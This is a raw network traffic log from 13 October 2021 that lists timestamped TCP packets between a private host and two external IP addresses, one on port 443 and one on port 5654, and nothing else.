Oct 13, 2021 21:02:25.437098026 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437118053 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437218904 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437248945 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437254906 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437262058 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437309027 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437375069 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437437057 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437462091 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437585115 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437592983 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437640905 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437680006 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437707901 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437755108 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437761068 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437794924 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437825918 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437871933 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437906981 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.437907934 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437958956 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.437966108 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438019037 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438097954 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438124895 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438203096 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438211918 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438304901 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438316107 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438322067 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438345909 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438374043 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438380003 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438416004 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438446045 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438460112 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438488960 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438524008 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438529015 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438623905 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438666105 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438692093 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438786030 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.438791990 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.438853979 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.439312935 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.492650032 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.492685080 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.492765903 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.492882013 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.492898941 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.493210077 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.493223906 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.493238926 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.496617079 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.496638060 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.496674061 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.496685028 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.496826887 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.496834993 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.496848106 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.496889114 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.497081995 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.497091055 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.497104883 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.497109890 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.497251034 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.497260094 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.497279882 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.497344017 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.497930050 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.497947931 CEST	443	49743	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:25.498078108 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.498236895 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.499207973 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:25.527590990 CEST	49743	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:34.220346928 CEST	49746	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:34.244812965 CEST	5654	49746	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:34.752038002 CEST	49746	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:34.776576042 CEST	5654	49746	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:35.277117968 CEST	49746	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:35.301716089 CEST	5654	49746	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:40.048461914 CEST	49747	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:40.096297026 CEST	5654	49747	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:40.596216917 CEST	49747	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:40.621658087 CEST	5654	49747	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:41.127537966 CEST	49747	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:41.152491093 CEST	5654	49747	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:45.906117916 CEST	49748	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:45.931962013 CEST	5654	49748	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:46.440453053 CEST	49748	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:46.466202021 CEST	5654	49748	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:46.971816063 CEST	49748	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:46.997580051 CEST	5654	49748	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:51.078059912 CEST	49751	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:51.102807045 CEST	5654	49751	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:51.613003969 CEST	49751	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:51.638070107 CEST	5654	49751	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:52.144125938 CEST	49751	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:52.203167915 CEST	5654	49751	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:53.277070999 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:53.277126074 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:53.278618097 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:53.371022940 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:53.371052027 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:53.481673956 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:53.481792927 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:53.489447117 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:53.489468098 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:53.489778042 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:53.534780025 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.091325998 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.139137983 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.165416956 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.165471077 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.165532112 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.165633917 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.165855885 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.165872097 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.165942907 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.165950060 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190500975 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190527916 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190591097 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190598965 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190603971 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.190639973 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190660954 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190669060 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190671921 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.190696955 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.190701962 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190720081 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190737963 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.190738916 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190751076 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190774918 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.190785885 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.190800905 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.190834999 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.215847015 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.215867996 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.215929031 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.215974092 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.215991020 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.216020107 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.216032028 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.216043949 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.216053009 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.216084003 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.216093063 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.216140985 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.216296911 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.216334105 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.216355085 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.216367006 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.216397047 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.241724014 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.241765976 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.241813898 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.241861105 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.241871119 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.241954088 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.241962910 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242213011 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242214918 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242234945 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242280006 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242292881 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242305040 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242368937 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242368937 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242387056 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242429972 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242472887 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242496014 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242547989 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242561102 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242572069 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242602110 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242743015 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242764950 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242815971 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242831945 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242857933 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242886066 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.242969036 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.242993116 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.243035078 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.243046999 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.243129969 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.243257999 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.243263006 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.268558979 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.268609047 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.268734932 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.268750906 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.268796921 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.268810034 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.268827915 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.268848896 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.268867970 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.268882990 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.268893003 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.268922091 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269169092 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269201994 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269238949 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269254923 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269272089 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269301891 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269386053 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269413948 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269447088 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269459009 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269489050 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269510031 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269757986 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269790888 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269851923 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269866943 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.269893885 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.269915104 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270011902 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270040989 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270092964 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270103931 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270155907 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270279884 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270308018 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270359993 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270370007 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270427942 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270591974 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270621061 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270628929 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270663023 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270673037 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270714045 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270735979 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270823002 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270833969 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270867109 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270896912 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270905972 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.270939112 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.270965099 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.271343946 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.318907022 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.318947077 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.319008112 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.319026947 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.319061041 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.319084883 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.320648909 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.320702076 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.320873022 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.320894957 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.320959091 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.322654963 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.322690964 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.322882891 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.322897911 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.322988987 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323349953 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323384047 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323463917 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323489904 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323533058 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323548079 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323564053 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323570967 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323600054 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323610067 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323616982 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323641062 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323649883 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323710918 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323724985 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323739052 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323800087 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323808908 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323854923 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323864937 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323885918 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.323906898 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.323924065 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324039936 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324055910 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324069977 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324075937 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324116945 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324153900 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324168921 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324212074 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324224949 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324254036 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324265003 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324275017 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324311972 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324359894 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324389935 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324399948 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324440002 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324445963 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324465990 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324477911 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324518919 CEST	443	49752	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:54.324522972 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.324563980 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.327204943 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.327438116 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:54.330910921 CEST	49752	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:55.529289007 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:55.529331923 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:55.531011105 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:55.579828024 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:55.579857111 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:55.685437918 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:55.685940027 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:55.692708015 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:55.692733049 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:55.693147898 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:55.738137960 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.306122065 CEST	49754	5654	192.168.2.7	91.121.250.249
Oct 13, 2021 21:02:56.312243938 CEST	49753	443	192.168.2.7	31.14.69.10
Oct 13, 2021 21:02:56.331244946 CEST	5654	49754	91.121.250.249	192.168.2.7
Oct 13, 2021 21:02:56.355151892 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.429431915 CEST	443	49753	31.14.69.10	192.168.2.7
Oct 13, 2021 21:02:56.429495096 CEST	443	49753	31.14.69.10	192.168.2.7
